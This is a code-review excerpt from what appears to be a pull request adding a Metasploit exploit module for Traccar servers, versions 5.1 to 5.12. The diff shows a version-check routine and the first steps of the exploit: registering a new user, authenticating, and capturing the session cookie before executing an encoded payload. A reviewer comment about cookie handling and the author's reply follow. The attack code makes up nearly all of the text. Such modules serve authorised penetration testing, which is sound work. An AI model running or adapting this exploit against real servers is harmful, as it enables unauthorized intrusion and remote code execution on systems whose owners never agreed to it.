modules/exploits/linux/http/traccar_rce_upload.rb

```diff
@@ -0,0 +1,252 @@
+        OptString.new('PASSWORD', [true, 'Password for the new user', Rex::Text.rand_text_alphanumeric(16)]),
+        OptString.new('EMAIL', [true, 'E-mail for the new user', Faker::Internet.email]),
+        OptString.new('TARGETURI', [ true, 'The URI for the Traccar web interface', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/server')
+    })
+
+    return CheckCode::Unknown unless res && res.code == 200
+
+    data = res.get_json_document
+    version = data['version']
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      vprint_status('Version retrieved: ' + version)
+    end
+
+    unless Rex::Version.new(version).between?(Rex::Version.new('5.1'), Rex::Version.new('5.12'))
+      return CheckCode::Safe
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    print_status('Registering new user...')
+    body = {
+      name: datastore['USERNAME'],
+      email: datastore['EMAIL'],
+      password: datastore['PASSWORD'],
+      totpKey: nil
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/users'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    # not quite necessary to check for this, since we exit all cases that are not 200 below, but this is a common error
+    # to run into when this module is executed more than once without updating the provided email address
+    if res.code == 400 && res.to_s.include?('Unique index or primary key violation')
+      vprint_status(res.to_s)
+      fail_with(Failure::UnexpectedReply, 'Error: The same E-mail already exists on the system')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    json = res.get_json_document
+
+    unless json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+    end
+
+    print_status('Authenticating...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/session'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'email' => datastore['EMAIL'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    jsessionid = res.get_cookies.scan(/JSESSIONID=([^;]+)/).flatten[0]
+    fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.') unless jsessionid
+    vprint_status("JSESSIONID: #{jsessionid}")
```

Comment:
We have automatic cookie handling that should be able to help with this. If you set the `keep_cookies` argument to `#send_request_cgi` to `true`, it should just work (TM).

Reply:
That works fine, thanks for suggesting `keep_cookies`.